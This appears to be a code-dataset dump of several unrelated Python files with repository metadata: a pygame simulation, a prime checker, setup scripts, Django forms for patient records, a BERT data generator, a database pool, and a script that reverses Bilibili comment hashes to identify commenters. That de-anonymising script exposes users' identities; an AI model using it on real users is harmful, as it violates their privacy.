if self.limit_fps: self.clock.tick( self.limit_fps_max )
else: self.clock.tick()
def update(self):
# Compute the distances between each pair of boxes
n_boxes = self.options.get( 'n_boxes' ).value
self.distance_matrix = np.zeros( [n_boxes,n_boxes] )
for pair in itertools.combinations( range( len( self.sheep ) ), 2 ):
s1 = self.sheep[ pair[0] ]
s2 = self.sheep[ pair[1] ]
d = math.hypot( s1.loc[0] - s2.loc[0], s1.loc[1] - s2.loc[1] )
self.distance_matrix[ pair[0],pair[1] ] = d
self.distance_matrix[ pair[1],pair[0] ] = d
for n in range( len( self.sheep ) ):
s = self.sheep[ n ]
status = s.update(self.action_panel_rect, n)
if ( status == 1 ):
self.sheep.remove( s )
elif ( status == 2 ):
self.game_init()
def handle_events(self):
# kmods = pygame.key.get_mods() # key modifiers
paused = False
while( True ):
events = pygame.event.get()
for event in events:
if(event.type == KEYDOWN):
if ( event.key == K_RETURN ):
self.game_init()
elif (event.key == K_SPACE): paused = not paused
elif (event.key == K_ESCAPE): self.quit()
elif (event.key in self.keyboard_bindings.keys() ):
opt_key = self.keyboard_bindings[ event.key ]
opt = self.options.get( opt_key )
# If not toggling a bool type, get user input
if opt.val_type != bool :
self.editOption( opt_key )
# fire a positionless click on the associated gui element
option_gui = self.control_buttons[ opt_key ]
if ( option_gui != None ):
option_gui[1]()
# Hack around the option design to change the number of boxes
if opt_key == 'n_boxes' :
self.update_n_boxes()
elif(event.type == MOUSEBUTTONDOWN):
# If clicked control panel
if self.control_panel_rect.collidepoint( event.pos ):
for opt_name, button in self.control_buttons.items():
button_rect = button[0]
button_hit = button[1]
if button_rect.collidepoint( event.pos ):
button_hit(click_pos=event.pos)
elif self.action_panel_rect.collidepoint( event.pos ):
self.options.get( 'n_boxes' ).value += 1
self.add_sheep( loc_list=[event.pos] )
if ( paused ):
pygame.time.wait( 50 )
else:
return
def draw(self):
# clear screen
self.screen.fill( self.color_bg, self.action_panel_rect )
for s in self.sheep:
first = True
w,h = s.width, s.height
for tail in s.tail:
x,y = tail
r = Rect(x, y, w, h)
self.action_panel.fill(s.color, r)
if first and self.options.get('draw_ROI').value:
pygame.draw.circle( self.action_panel, s.color, (int(x), int(y)), int(self.options.get('ROI').value), 1 )
first = False
pygame.display.flip()
def quit(self):
sys.exit(0)
def display_box(self, x, y, string):
"Print a message box at x,y"
fontobject = pygame.font.Font(None,18)
pygame.draw.rect(self.screen, self.color_bg, (x, y, 200, 20), 0)
if( len( string ) > 0 ):
self.screen.blit( fontobject.render(string, 1, (255,255,255)), (x, y) )
pygame.display.flip()
def drawOption(self, x, y, key, val, editable=False):
val = str( val )
self.display_box(x, y, "%s: %s" % (key, val) )
if ( editable ):
while 1:
inkey = self.get_key()
if inkey == K_BACKSPACE:
val = val[0:-1]
elif inkey == K_RETURN:
break
elif inkey == K_MINUS:
val += "_"
elif inkey <= 127:
val += chr(inkey)
self.display_box(x, y, "%s: %s" % (key, val) )
return val
def get_key(self):
while 1:
event = pygame.event.poll()
if event.type == KEYDOWN:
return event.key
else:
pass
def randLoc(self):
size = (self.action_panel_rect.width, self.action_panel_rect.height)
return [ np.random.randint(0, size[0] - 0 ) + self.action_panel_rect.x,
np.random.randint(0, size[1] - 0 ) + self.action_panel_rect.y ]
def randVelocity(self, init_speed):
rad = np.radians( np.random.randint(0,360) )
return [np.cos(rad) * init_speed, np.sin(rad) * init_speed]
def randColor(self):
return ( np.random.randint( 50, 255 ), np.random.randint( 50, 255 ), np.random.randint( 50, 255 ) )
# TODO:
# - make self.options accessible w/o .get(key) becuase this is really just a specialized dict
# - initialize options with a dict with required/optional keys (bools shouldn't need to supply min/max)
# - callbacks for value changes should be installed here
class OptionsHandler():
def __init__(self, option_list):
self.options = {}
for opt_spec in option_list:
key, value, shortcut_key, value_type, min, max = opt_spec
if key in self.options.keys():
raise Exception(
"OptionsHandler initilized with duplicate key {0}={1} and {0}={2}".format(
key,
self.options[name].value,
value )
)
self.options[ key ] = Option( key, value, shortcut_key, value_type, min, max )
def get(self, key):
if( not key in self.options.keys() ):
raise UnsupportedOptionException( key )
return self.options[ key ]
def keys(self):
return self.options.keys()
def values(self):
return self.options.values()
def items(self):
ret = []
for key, opt in self.options.items():
ret.append( [key, opt.value] )
return ret
def toggle(self, key):
option = self.get( key )
if ( not option.val_type == bool ):
raise ValueError( "Can't toggle non-boolean type: {0} (type={1})".format(key, option.val_type ) )
option.value = not option.value
return option.value
def set(self, key, value):
opt = self.get( key )
# force option to its type
# TODO: catch value exceptions and let the user keep trying
opt.value = opt.val_type( value )
class Option():
def __init__(self, key, value, shortcut_key=None, val_type=None, min=None, max=None ):
self.key = key
self.value = value
self.shortcut_key = shortcut_key
self.min = min
self.max = max
# best guess for val for yet-to-be implemented user input casting
if val_type == None:
self.val_type = val_type( value )
else:
self.val_type = val_type
class UnsupportedOptionException(Exception):
def __init__(self, key):
self.key = key
def __str__(self):
return 'Unsuppored option: %s' % self.key
def __unicode__(self):
return self.__str__()
# NOTE:
# assumes left/right arrow graphic are same size, and square
# assumes width=100 ticks
class Slider():
def __init__(self, game, x, y, option):
self.id = option.key
self.option = option
self.x = x # x position of slider object
self.y = y # y position of slider object
self.game = game # reference to the main game object
self.per_index = ( float(self.option.max) - float(self.option.min) ) / 100 # value represented by one click (pixel)
self.arrow_width = game.scroll_bar_right.get_width()
# Draw the left/right arrows
game.screen.blit( game.scroll_bar_left, (x,y) )
game.screen.blit( game.scroll_bar_right, (x + 100 + self.arrow_width, y) )
# Rect over which the needle moves
self.slide_area = Rect( x + self.arrow_width, y, 100, self.arrow_width )
# Draw a border around the slide area
slide_area_border = Rect( x + self.arrow_width - 1, y - 1, 102, self.arrow_width + 2 )
pygame.draw.rect( game.screen, (100,100,90), slide_area_border, 1 )
# Initialize needle
self.needle = Rect( 0, y, 1, self.arrow_width )
self.update_needle_position()
self.draw_needle()
def update_needle_position( self ):
x_offset = 100 * (float(self.option.value) / self.option.max)
self.needle.x = self.x + self.arrow_width + x_offset
self.draw_needle()
def draw_needle( self ):
self.game.screen.fill( (0,0,0), self.slide_area )
self.game.screen.fill( (50,50,50), self.needle )
self.game.screen.fill( (50,50,50), self.needle )
def inc(self):
if self.option.value + self.per_index <= self.option.max :
self.option.value += self.per_index
self.needle.move_ip(1, 0)
self.draw_needle()
return self.option.value
def dec(self):
if self.option.value - self.per_index >= self.option.min :
self.option.value -= self.per_index
self.needle.move_ip(-1, 0)
self.draw_needle()
return self.option.value
def click(self, pos):
if pos == None:
self.update_needle_position()
elif pos[0] < self.x + self.game.scroll_bar_left.get_width() :
self.dec()
elif pos[0] > self.x + self.game.scroll_bar_left.get_width() + 100 :
self.inc()
return self.option.value
if __name__ == '__main__':
g = GameMain()
g.loop()
| [
"ajwood@mta.ca"
] | ajwood@mta.ca |
b2149ffcc18045825f21ffeaf5c3673ba7206c0c | 56916eb9752cce2b7c48bf356e71cf0720a82126 | /Python-Programming/primeOrNot.py | af3d24f322d206a1d8594c7358406a28d4bbce40 | [] | no_license | pemagrg1/tkinter-sample-code | 8916e10f4b859862dd1031c759dd61292eb99fc4 | f66f79dd421cf83f18877aec0d58a8790adcc80d | refs/heads/master | 2022-04-29T15:52:00.893059 | 2022-03-29T05:40:09 | 2022-03-29T05:40:09 | 130,752,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | # Check if given number is prime or not. Ex Prime numbers: 2, 3, 5, 7, 13
i, temp = 0, 0
n = int(input("please give a number : "))
for i in range(2, n//2):
if n % i == 0:
temp = 1
break
if temp == 1:
print("given number is not prime")
else:
print("given number is prime")
| [
"pema.grg1@gmail.com"
] | pema.grg1@gmail.com |
d89d258c7988794ab7a17bb1bc243baa9f8719ed | 6c563ee5d6018d08e1ddc414592e1e23c06c60cc | /setup.py | 3b4d2dccece35687f3e583454df3533ce809f197 | [
"MIT"
] | permissive | cesarfm/pyimgy | b3b3b92226fb9dfb8ea74dd2e26fdb6bc7795fc1 | ce333acc183b787b46b95bd8e44dc6679fd1547f | refs/heads/master | 2022-11-24T20:15:11.736867 | 2020-01-29T08:26:33 | 2020-01-29T08:26:33 | 218,964,448 | 2 | 0 | MIT | 2022-11-22T05:31:09 | 2019-11-01T10:28:34 | Jupyter Notebook | UTF-8 | Python | false | false | 1,490 | py | #!/usr/bin/env python
"""
# pyimgy
A small library of image tools for Python
## Features
- `ImageConverter`: a universal, extensible component for easily converting images to different types, array shapes and normalizations.
- `core`: seamless conversion between numpy and Pillow; annotations for conversion and auto plot axes
- `image_crop`: `ImageCropper`, automatic cropping of an image's border frame
- `utils`: various tools
- get palette of an image
"""
from setuptools import setup, find_packages
DOCLINES = (__doc__ or '').split("\n")
long_description = "\n".join(DOCLINES[2:])
version = '0.1.0'
setup(
name='pyimgy',
version=version,
author='César Fuentes',
author_email='cesar.at.fuentes@gmail.com',
description='A small library of image tools for Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/cesarfm/pyimgy',
packages=find_packages(include=['pyimgy', 'pyimgy.*']),
install_requires=[
'typing',
'numpy',
'Pillow',
'matplotlib',
'opencv-python'
],
extras_require={
'torch': ['torch'],
'fastai': ['torch', 'fastai']
},
classifiers=[
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
)
| [
"cesar.at.fuentes@gmail.com"
] | cesar.at.fuentes@gmail.com |
a4a6857da44652a4332705772a0d0471a535883c | 08a029abcb595e1ef26ac4cb5751976ce17706ac | /main.py | f1cab476053a12360c9b940c38c26f437c05feed | [] | no_license | 221294583/danmu_cracker | fb96a99f77b8c7afd97fd2f0058c582653c77529 | 26e28846876b0b03410cf65f88fd2fc32a7e1fc1 | refs/heads/master | 2022-12-24T13:24:27.135703 | 2020-08-27T09:04:50 | 2020-08-27T09:04:50 | 263,972,990 | 2 | 2 | null | 2020-08-16T03:06:49 | 2020-05-14T16:51:55 | Python | UTF-8 | Python | false | false | 1,266 | py | import numpy as np
import getcomment
#import crackcrc32
import visit
import crack
def process():
videocode=input("请输入视频地址:")
list_ini=getcomment.getlist(videocode)
list_ini.soup()
list_ini.finder()
list_ini.getmark()
bullet=(input('请输入要查找的关键词:'))
all_bullet=list_ini.filterconcrete(bullet)
all_crc32s=list_ini.getcrc32()
#crackcrc32.create_table()
crack.main()
all_uid=[]
for ch in all_crc32s:
temp=crack.crackl4(ch)[0]
#print(type(temp))
all_uid.append(temp)
all_space=[]
for ch in all_uid:
temp=['http://space.bilibili.com/',ch]
buffer=''.join(temp)
all_space.append(buffer)
user_nickname=visit.user_info(all_space)
nicknames=user_nickname.getnickname()
print('弹幕信息以及发送者信息:','\n')
for i in range(len(all_bullet)):
temp=['http://space.bilibili.com/',all_uid[i]]
print('弹幕内容:',' ',all_bullet[i],' ','用户昵称:',' ',nicknames[i],' ','空间网址:',' ',(''.join(temp)))
return all_bullet, all_crc32s, all_space, all_uid, bullet, ch, i, list_ini, nicknames, user_nickname, videocode
| [
"noreply@github.com"
] | 221294583.noreply@github.com |
a9c2ba91d8e2941c83227620c6cba49e96c59c48 | 9040048fd225aa3b755385ce8c14053d6e19f193 | /json_to_texts.py | 38f17d22dd6a20bd1016699c8439de13148f7a4e | [] | no_license | fireae/PageLayoutAnalyze | af13896a61286eb13a5490b8c097d5b7bc199650 | 05b6907ce329b7b827b21059a209cb93d348cccd | refs/heads/master | 2020-06-07T11:02:22.166135 | 2019-03-17T08:47:01 | 2019-03-17T08:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | import json
data_set = open('D:\Coding\\tensorflow-deeplab-resnet\dataset\\test.txt', 'r').readlines()
images = [image.split(' ')[0].replace("/JpegImages/", "").replace(".jpg", "") for image in data_set]
with open('predicted_boxes.json') as json_data:
d = json.load(json_data)
save_dir = 'D:\Coding\Object-Detection-Metrics\detections'
for idx, image in enumerate(images):
if idx == 38:
break
ws = open(image + ".txt", "w")
list_labels = d[image]['labels']
list_bbxs = d[image]['boxes']
list_conf = d[image]['confidence_score']
for idx,label in enumerate(list_labels):
bbx = list_bbxs[idx]
ws.write(list_labels[idx] + " " + str(list_conf[idx]) + " " +
str(bbx[0]) + " " + str(bbx[1]) + " " +
str(bbx[2]) + " " + str(bbx[3]) + "\n")
ws.close()
| [
"quoccbinh@gmail.com"
] | quoccbinh@gmail.com |
01afb879d493cb53f44e6bc66aeb36232e02039c | 28725525432ae67126ba48006361f939a35a8c2b | /imama/forms.py | 689ac60ca8e1597306fdc898b4747ff55d388ee6 | [] | no_license | ClaudiaStrm/cadastro-imama | 8d5083e8402cdf58818db01c62941c2ad6b71ddb | 2cd29858fed3565d400b4016a8747c50f2286058 | refs/heads/master | 2021-09-14T04:26:45.275044 | 2018-05-08T13:03:47 | 2018-05-08T13:03:47 | 110,761,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | from django import forms
from .models import Paciente, AmigoRosa
class PacienteForm(forms.ModelForm):
class Meta:
model = Paciente
fields = ('nome', 'local_palestra', 'data_nascimento',
'sexo', 'etnia', 'telefone', 'celular', 'email', 'endereco',
'cidade', 'contato_nome', 'contato_telefone', 'amigo_rosa',
'data_entrevista','UAB_referencia', 'cartao_sus',
'sistema_saude', 'beneficio_governo', 'qtdade_filhos',
'estado_civil', 'idade_filhos', 'profissao',
'exerce_profissao', 'data_menarca', 'menopausa',
'data_menopausa', 'reposicao_hormonal', 'data_reposicao_hormonal',
'local_trabalho', 'sustenta_familia', 'pessoas_familia',
'escolaridade', 'motivos_servico_saude', 'ultima_consulta_ginecologista',
'auto_exame', 'exame_profissional', 'data_mamografia',
'conclusao_laudo_mamografia', 'data_outros_exames', 'conclusao_laudo_outros_exames',
'orientacoes_exames', 'alteracao_mama', 'familiares_cancer_mama',
'cirurgia_mamas', 'tipo_cirurgia_mamas', 'observacoes_entrevista',
)
class AmigoRosaForm(forms.ModelForm):
class Meta:
model = AmigoRosa
fields = ('nome', 'endereco', 'contato', 'celular',
'data_nascimento','email', 'email',
'curso', 'cpf', 'rg',
)
| [
"claudiasm@protonmail.com"
] | claudiasm@protonmail.com |
cbbe67c6d8b42f1f434378ce427870868349c359 | 4a806e7149bc6ee784e72ac8be068953180bf202 | /app01/migrations/0001_initial.py | 5e04b1a47e8c96d5ce2fdff23323bdd00efc010c | [] | no_license | aiwenfeixiang/highcharts | 9f99e63c9fc68a2e8b16f05bc17dd825f24f6402 | 3673b9de70582736d67cf672e43717a7da2845eb | refs/heads/master | 2020-09-09T12:19:01.303973 | 2019-11-13T11:42:46 | 2019-11-13T11:42:46 | 221,444,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2019-11-06 11:01
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Depart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=32, verbose_name='部门')),
],
),
migrations.CreateModel(
name='Server',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=32, verbose_name='主机名')),
('depart', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app01.Depart', verbose_name='部门')),
],
),
]
| [
"853648122@qq.com"
] | 853648122@qq.com |
acdee8e7dc59c9448b02b36d294aed46fbe74f2f | 0ca3a635fe2358ae562c04516226753fcd4a6729 | /src/create_generators.py | 64893b0a27c4158567b3833c44c58fc9d82963d0 | [] | no_license | YL1113/bert-multitask-learning | 9302037537c9c50a49ba2bb53a2f1db15904c7e2 | 182cb78efba46905cc1a804dcd7771b40475e874 | refs/heads/master | 2020-04-29T16:57:56.837957 | 2019-03-18T07:06:05 | 2019-03-18T07:06:05 | 176,280,952 | 1 | 0 | null | 2019-03-18T12:32:51 | 2019-03-18T12:32:50 | null | UTF-8 | Python | false | false | 16,070 | py | import random
from copy import copy
import numpy as np
import tensorflow as tf
from .utils import (punc_augument, tokenize_text_with_seqs,
create_mask_and_padding, create_masked_lm_predictions,
truncate_seq_pair, add_special_tokens_with_seqs,
BOS_TOKEN, EOS_TOKEN,
create_instances_from_document)
from .tokenization import printable_text
def create_single_problem_generator(problem,
inputs_list,
target_list,
label_encoder,
params,
tokenizer,
mode):
"""Function to create iterator for single problem
This function will:
1. Do some text cleaning using original bert tokenizer, if
problem type is sequential tagging, corresponding labels
will be removed.
Example:
Before: inputs: ['a', '&', 'c'] target: [0, 0, 1]
After: inputs: ['a', 'c'] target: [0, 1]
2. Add [CLS], [SEP] tokens
3. Padding
4. yield result dict
Arguments:
problem {str} -- problem name
inputs_list {list } -- inputs list
target_list {list} -- target list, should have the same length as inputs list
label_encoder {LabelEncoder} -- label encoder
params {Params} -- params
tokenizer {tokenizer} -- Bert Tokenizer
epoch {int} -- Deprecate
"""
problem_type = params.problem_type[problem]
# whether this problem is sequential labeling
# for sequential labeling, targets needs to align with any
# change of inputs
is_seq = problem_type in ['seq_tag']
for ex_index, example in enumerate(zip(inputs_list, target_list)):
raw_inputs, raw_target = example
# punctuation augumentation
if params.punc_replace_prob > 0 and mode == 'train':
raw_inputs = punc_augument(raw_inputs, params)
# tokenize inputs, now the length is fixed, target == raw_target
if isinstance(raw_inputs, dict):
tokens_a, target = tokenize_text_with_seqs(
tokenizer, raw_inputs['a'], raw_target, is_seq)
tokens_b, _ = tokenize_text_with_seqs(
tokenizer, raw_inputs['b'], raw_target)
else:
tokens_a, target = tokenize_text_with_seqs(
tokenizer, raw_inputs, raw_target, is_seq)
tokens_b = None
if tokens_b is not None and is_seq:
raise NotImplementedError(
'Sequence Labeling with tokens b is not implemented')
if not tokens_a:
continue
# check whether tokenization changed the length
if len(raw_inputs) != len(tokens_a):
tf.logging.warning('Data %d broken' % ex_index)
continue
# truncate tokens and target to max_seq_len
tokens_a, tokens_b, target = truncate_seq_pair(
tokens_a, tokens_b, target, params.max_seq_len, is_seq=is_seq)
# add [SEP], [CLS] tokens
tokens, segment_ids, target = add_special_tokens_with_seqs(
tokens_a, tokens_b, target, is_seq)
# train mask lm as augument task while training
if params.augument_mask_lm and mode == 'train':
rng = random.Random()
(mask_lm_tokens, masked_lm_positions,
masked_lm_labels) = create_masked_lm_predictions(
tokens,
params.masked_lm_prob,
params.max_predictions_per_seq,
list(tokenizer.vocab.keys()), rng)
_, mask_lm_tokens, _, _ = create_mask_and_padding(
mask_lm_tokens, copy(segment_ids), copy(target), params.max_seq_len, is_seq)
masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
mask_lm_input_ids = tokenizer.convert_tokens_to_ids(
mask_lm_tokens)
masked_lm_ids = tokenizer.convert_tokens_to_ids(masked_lm_labels)
input_mask, tokens, segment_ids, target = create_mask_and_padding(
tokens, segment_ids, target, params.max_seq_len, is_seq)
# create mask and padding for labels of seq2seq problem
if problem_type in ['seq2seq_tag', 'seq2seq_text']:
target, _, _ = truncate_seq_pair(
target, None, None, params.decode_max_seq_len, is_seq=is_seq)
# since we initialize the id to 0 in prediction, we need
# to make sure that BOS_TOKEN is [PAD]
target = [BOS_TOKEN] + target + [EOS_TOKEN]
label_mask, target, _, _ = create_mask_and_padding(
target, [0] * len(target), None, params.decode_max_seq_len)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
if isinstance(target, list):
label_id = label_encoder.transform(target).tolist()
label_id = [np.int32(i) for i in label_id]
else:
label_id = label_encoder.transform([target]).tolist()[0]
label_id = np.int32(label_id)
assert len(input_ids) == params.max_seq_len
assert len(input_mask) == params.max_seq_len
assert len(segment_ids) == params.max_seq_len, segment_ids
if is_seq:
assert len(label_id) == params.max_seq_len
# logging in debug mode
if ex_index < 5:
tf.logging.debug("*** Example ***")
tf.logging.debug("tokens: %s" % " ".join(
[printable_text(x) for x in tokens]))
tf.logging.debug("input_ids: %s" %
" ".join([str(x) for x in input_ids]))
tf.logging.debug("input_mask: %s" %
" ".join([str(x) for x in input_mask]))
tf.logging.debug("segment_ids: %s" %
" ".join([str(x) for x in segment_ids]))
if is_seq or problem_type in ['seq2seq_tag', 'seq2seq_text']:
tf.logging.debug("%s_label_ids: %s" %
(problem, " ".join([str(x) for x in label_id])))
tf.logging.debug("%s_label: %s" %
(problem, " ".join([str(x) for x in target])))
else:
tf.logging.debug("%s_label_ids: %s" %
(problem, str(label_id)))
tf.logging.debug("%s_label: %s" %
(problem, str(target)))
if params.augument_mask_lm and mode == 'train':
tf.logging.debug("mask lm tokens: %s" % " ".join(
[printable_text(x) for x in mask_lm_tokens]))
tf.logging.debug("mask lm input_ids: %s" %
" ".join([str(x) for x in mask_lm_input_ids]))
tf.logging.debug("mask lm label ids: %s" %
" ".join([str(x) for x in masked_lm_ids]))
tf.logging.debug("mask lm position: %s" %
" ".join([str(x) for x in masked_lm_positions]))
# create return dict
if not params.augument_mask_lm:
return_dict = {
'input_ids': input_ids,
'input_mask': input_mask,
'segment_ids': segment_ids,
'%s_label_ids' % problem: label_id
}
else:
if mode == 'train' and random.uniform(0, 1) <= params.augument_rate:
return_dict = {
'input_ids': mask_lm_input_ids,
'input_mask': input_mask,
'segment_ids': segment_ids,
'%s_label_ids' % problem: label_id,
"masked_lm_positions": masked_lm_positions,
"masked_lm_ids": masked_lm_ids,
"masked_lm_weights": masked_lm_weights,
}
else:
return_dict = {
'input_ids': input_ids,
'input_mask': input_mask,
'segment_ids': segment_ids,
'%s_label_ids' % problem: label_id,
"masked_lm_positions": np.zeros([params.max_predictions_per_seq]),
"masked_lm_ids": np.zeros([params.max_predictions_per_seq]),
"masked_lm_weights": np.zeros([params.max_predictions_per_seq]),
}
if problem_type in ['seq2seq_tag', 'seq2seq_text']:
return_dict['%s_mask' % problem] = label_mask
yield return_dict
def create_pretraining_generator(problem,
inputs_list,
target_list,
label_encoder,
params,
tokenizer
):
"""Slight modification of original code
Raises:
ValueError -- Input format not right
"""
if not isinstance(inputs_list[0][0], list):
raise ValueError('inputs is expected to be list of list of list.')
all_documents = []
for document in inputs_list:
all_documents.append([])
for sentence in document:
all_documents[-1].append(tokenizer.tokenize('\t'.join(sentence)))
all_documents = [d for d in all_documents if d]
rng = random.Random()
rng.shuffle(all_documents)
vocab_words = list(tokenizer.vocab.keys())
instances = []
print_count = 0
for _ in range(params.dupe_factor):
for document_index in range(len(all_documents)):
instances = create_instances_from_document(
all_documents,
document_index,
params.max_seq_len,
params.short_seq_prob,
params.masked_lm_prob,
params.max_predictions_per_seq,
vocab_words, rng)
for instance in instances:
tokens = instance.tokens
segment_ids = list(instance.segment_ids)
input_mask, tokens, segment_ids, _ = create_mask_and_padding(
tokens, segment_ids, None, params.max_seq_len)
masked_lm_positions = list(instance.masked_lm_positions)
masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
instance.masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
masked_lm_ids = tokenizer.convert_tokens_to_ids(
masked_lm_labels)
next_sentence_label = 1 if instance.is_random_next else 0
yield_dict = {
"input_ids": input_ids,
"input_mask": input_mask,
"segment_ids": segment_ids,
"masked_lm_positions": masked_lm_positions,
"masked_lm_ids": masked_lm_ids,
"masked_lm_weights": masked_lm_weights,
"next_sentence_label_ids": next_sentence_label
}
if print_count < 3:
tf.logging.debug('%s : %s' %
('tokens', ' '.join([str(x) for x in tokens])))
for k, v in yield_dict.items():
if not isinstance(v, int):
tf.logging.debug('%s : %s' %
(k, ' '.join([str(x) for x in v])))
print_count += 1
yield yield_dict
def create_generator(params, mode, epoch):
"""Function to create iterator for multiple problem
This function dose the following things:
1. Create dummy labels for each problems.
2. Initialize all generators
3. Sample a problem to train at this batch. If eval, take turns
4. Create a loss multiplier
5. Tried to generate samples for target problem, if failed, init gen
6. Add dummy label to other problems
Example:
Problem: CWS|NER|weibo_ner&weibo_cws
1. Dummy labels: CWS_label_ids: [0,0,0] ...
2. Blablabla
3. Sample, say (weibo_ner&weibo_cws)
4. loss multipliers: {'CWS_loss_multiplier': 0, ..., 'weibo_ner_loss_multiplier': 1, ...}
...
Arguments:
params {Params} -- params
mode {mode} -- mode
epoch {int} -- epochs to run
"""
# example
# problem_list: ['NER', 'CWS', 'weibo_ner', 'weibo_cws']
# problem_chunk: [['NER'], ['CWS'], ['weibo_ner', 'weibo_cws']]
problem_list = []
problem_chunk = []
for problem_dict in params.run_problem_list:
problem_list += list(problem_dict.keys())
problem_chunk.append(list(problem_dict.keys()))
# get dummy labels
def _create_dummpy_label(problem_type):
if problem_type == 'cls':
return 0
else:
return [0]*params.max_seq_len
dummy_label_dict = {problem+'_label_ids': _create_dummpy_label(
params.problem_type[problem]) for problem in problem_list if params.problem_type[problem] != 'pretrain'}
# init gen
gen_dict = {problem: params.read_data_fn[problem](params, mode)
for problem in problem_list}
while gen_dict:
# sample problem to train
if len(problem_chunk) > 1:
data_num_list = [params.data_num_dict[chunk[0]]
for chunk in problem_chunk]
if params.multitask_balance_type == 'data_balanced':
sample_prob = np.array(data_num_list) / np.sum(data_num_list)
current_problem_chunk_ind = np.random.choice(
list(range(len(problem_chunk))), p=sample_prob)
current_problem_chunk = problem_chunk[current_problem_chunk_ind]
elif params.multitask_balance_type == 'problem_balanced':
sample_prob = np.array(
[1]*len(data_num_list)) / np.sum([1]*len(data_num_list))
current_problem_chunk_ind = np.random.choice(
list(range(len(problem_chunk))), p=sample_prob)
current_problem_chunk = problem_chunk[current_problem_chunk_ind]
else:
current_problem_chunk = problem_chunk[0]
# create loss multiplier
loss_multiplier = {}
for problem in problem_list:
if problem in current_problem_chunk:
loss_multiplier[problem+'_loss_multiplier'] = 1
else:
loss_multiplier[problem+'_loss_multiplier'] = 0
base_dict = {}
base_input = None
for problem in current_problem_chunk:
try:
instance = next(gen_dict[problem])
except StopIteration:
if mode == 'train':
gen_dict[problem] = params.read_data_fn[problem](
params, mode)
instance = next(gen_dict[problem])
else:
del gen_dict[problem]
continue
except KeyError:
continue
base_dict.update(instance)
if base_input is None:
base_input = instance['input_ids']
elif not params.augument_mask_lm:
assert base_input == instance[
'input_ids'], 'Inputs id of two chained problem not aligned. Please double check!'
if not base_dict:
continue
# add dummpy labels
for dummy_problem in dummy_label_dict:
if dummy_problem not in base_dict:
base_dict[dummy_problem] = dummy_label_dict[dummy_problem]
# add loss multipliers
base_dict.update(loss_multiplier)
yield base_dict
| [
"junpang.yip@gmail.com"
] | junpang.yip@gmail.com |
50c69f457a69549e37c8d673248b6a8b5ea1b3a8 | 8f02d21497912679d6ab91ea382ac9c477bda4fe | /setup.py | fb31227d6331999511c7297da29c6fb9b29c9e53 | [
"MIT"
] | permissive | DouglasWilcox/tpRigToolkit-dccs-maya-plugins-rbfsolver | ae2291f3e7117010341faeb7881998ec885dc216 | 3503c9b3982fe550a3d53dde79d3bf427c1b2289 | refs/heads/master | 2021-03-13T14:24:55.464354 | 2020-02-11T00:28:31 | 2020-02-11T00:28:31 | 246,688,218 | 1 | 0 | null | 2020-03-11T22:00:02 | 2020-03-11T22:00:01 | null | UTF-8 | Python | false | false | 104 | py | from setuptools import setup
from tpRigToolkit.dccs.maya.plugins.rbfsolver import __version__
setup()
| [
"tpovedatd@gmail.com"
] | tpovedatd@gmail.com |
e55349cdae31ad6838c68bcf8a78353c4625794a | 1e0355b293100873cedfcac789655a35180781db | /BOJ1541.py | 80f1eee1110f147baa91c39f0bbea9e2989c2d24 | [
"MIT"
] | permissive | INYEONGKIM/BOJ | 47dbf6aeb7a0f1b15208866badedcd161c00ee49 | 5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc | refs/heads/master | 2021-06-14T13:50:04.124334 | 2021-03-09T14:04:14 | 2021-03-09T14:04:14 | 168,840,573 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | s=input().split("-")
if s[0]=="":
res=0
else:
res=sum(map(int,s[0].split("+")))
for i in range(1,len(s)):
res-=sum(map(int,s[i].split("+")))
print(res)
| [
"noreply@github.com"
] | INYEONGKIM.noreply@github.com |
8d796048dae5c5b5f7ff417ad810b0eb8ceedf95 | 08d6297654bce1043c7a1f466d1e94a0edbe127b | /DatabaseConnectionPool.py | 1a520abddc676328652b298dcc47c1b901a63d06 | [] | no_license | xzf199358/grace_jiubao | 6db0a21aa8ef8e8d4639bf22dcf5682993005e5e | afc5274e4f9f8adebae3940256a61adaec8443a5 | refs/heads/master | 2023-01-09T12:51:21.034087 | 2020-11-14T09:07:51 | 2020-11-14T09:07:51 | 312,781,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,741 | py | # -*- coding: UTF-8 -*-
import sys
import psycopg2
from LoggerModule import Logger
from ConfigManager import ConfigParameter as configs
from DBUtils.PooledDB import PooledDB
import ToolFunctions
class DatabaseConnectionPool:
pool = None
@classmethod
def create_pool(cls):
try:
cls.pool = PooledDB(psycopg2, maxconnections = configs.max_connection_num,
mincached = configs.min_cached_num, maxcached = configs.max_cached_num,
maxshared = configs.max_shared_num, application_name = configs.application_name_for_database_connection,
host = configs.database_host, port=configs.database_port, dbname = configs.database_name,
user = configs.database_user_name, password=configs.database_password)
return cls
except Exception as e:
Logger.fatal("failed to initialize Database Connection Pool. System is exiting!")
Logger.fatal(repr(e))
ToolFunctions.sys_exit(301)
@classmethod
def get_connection(cls):
try:
return cls.pool.connection()
except Exception as e:
Logger.error("when get connection from pool!")
Logger.error(repr(e))
return None
@classmethod
